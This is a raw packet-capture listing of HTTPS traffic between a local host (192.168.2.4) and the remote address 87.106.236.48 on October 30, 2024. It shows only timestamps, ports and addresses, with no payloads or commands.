                                                                                              Oct 30, 2024 19:47:17.950158119 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.950916052 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.950931072 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.950974941 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.950982094 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.951011896 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.951026917 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.951138973 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.951153994 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.951198101 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.951205015 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.951229095 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.951245070 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.951407909 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.951421976 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.951467037 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.951472998 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.951500893 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.951586008 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.952174902 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.952191114 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.952224970 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.952231884 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.952255964 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.952275038 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.952959061 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.952971935 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.953013897 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.953021049 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.953044891 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.953058004 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.953879118 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.953895092 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.953936100 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.953943014 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.953963995 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.953995943 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.976939917 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.976974010 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.977025986 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.977035999 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.977077007 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.977200985 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.977219105 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.977247000 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.977252007 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.977273941 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.977305889 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.978178024 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.978198051 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.978244066 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.978249073 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.978285074 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.978291988 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.010469913 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.010500908 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.010546923 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.010566950 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.010590076 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.010624886 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.054847956 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.054868937 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.054928064 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.054938078 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.054980993 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.071389914 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.071409941 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.071449995 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.071456909 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.071486950 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.071506023 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.072036982 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.072057009 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.072088957 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.072094917 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.072122097 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.072140932 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.072923899 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.072943926 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.072979927 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.072985888 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.073014021 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.073035002 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.073714018 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.073733091 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.073766947 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.073774099 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.073802948 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.073811054 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.074335098 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.074354887 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.074383974 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.074389935 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.074419975 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.074434996 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.075016975 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.075037956 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.075073004 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.075078964 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.075109005 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.075637102 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.075656891 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.075685024 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.075690985 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.075721025 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.075740099 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.076317072 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.076349020 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.076375961 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.076381922 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.076411009 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.076436043 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.095180035 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.095201969 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.095246077 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.095253944 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.095287085 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.095305920 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.095910072 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.095937967 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.095969915 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.095977068 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.096004009 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.096020937 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.096698046 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.096719980 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.096754074 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.096760035 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.096790075 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.096807957 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.134383917 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.134407997 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.134449005 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.134458065 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.134493113 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.134501934 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.135649920 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.135673046 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.135708094 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.135715008 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.135740995 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.135759115 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.214730024 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.214755058 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.214797020 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.214809895 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.214823961 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.214845896 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.215554953 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.215575933 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.215619087 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.215626955 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.215653896 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.215673923 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.215698004 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.216161966 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.216180086 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.216217995 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.216223955 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.216244936 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.216247082 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.216275930 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.216275930 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.216295004 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.216310978 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.216345072 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.220136881 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.220158100 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.220195055 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.220201015 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.220232010 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.220241070 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.220834970 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.220860004 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.220916033 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.220922947 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.220953941 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.220968962 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.221288919 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.221308947 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.221354961 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.221362114 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.221386909 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.221411943 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.222212076 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.222234011 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.222285986 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.222291946 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.222305059 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.222331047 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.223143101 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.223161936 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.223197937 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.223203897 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.223216057 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.223229885 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.223242044 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.223248959 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.223258018 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.223275900 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.223308086 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.224117041 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.224134922 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.224210024 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.224217892 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.224261045 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.224806070 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.224823952 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.224853039 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.224859953 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.224885941 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.224903107 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.263128042 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.263150930 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.263222933 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.263231993 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.263272047 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.301103115 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.301125050 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.301202059 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.301213980 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.301255941 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.343624115 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.343648911 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.343694925 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.343703985 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.343719959 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.343755007 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.360138893 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.360161066 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.360208035 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.360217094 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.360245943 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.360264063 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.386090040 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.386112928 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.386167049 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.386174917 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.386209965 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.386229038 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.403325081 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.403346062 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.403517962 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.403527021 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.403565884 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.420161009 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.420181990 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.420222998 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.420231104 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.420248032 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.420268059 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.436347961 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.436372995 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.436408997 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.436417103 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.436443090 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.436460972 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.441921949 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.441942930 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.441975117 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.441982985 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.441992998 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.442018986 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.442222118 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.442248106 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.442277908 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.442284107 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.442300081 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.442323923 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.442749977 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.442770004 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.442814112 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.442825079 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.442850113 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.442859888 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.443592072 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.443613052 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.443654060 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.443660975 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.443685055 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.443703890 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.444513083 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.444531918 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.444575071 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.444583893 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.444631100 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.445358992 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.445377111 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.445420980 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.445426941 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.445437908 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.445441008 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.445461988 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.445472002 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.445485115 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.445485115 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.445519924 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.445534945 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.446316004 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.446336031 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.446374893 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.446382046 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.446393013 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.446418047 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.447053909 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.447072983 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.447105885 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.447112083 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.447139025 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.447154045 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.461997032 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.462017059 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.462121964 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.462127924 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.462143898 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.462169886 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.462779045 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.462798119 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.462835073 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.462841034 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.462857008 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.462873936 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.463462114 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.463480949 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.463509083 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.463515043 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.463548899 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.463567019 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.464112997 CET4434973187.106.236.48192.168.2.4
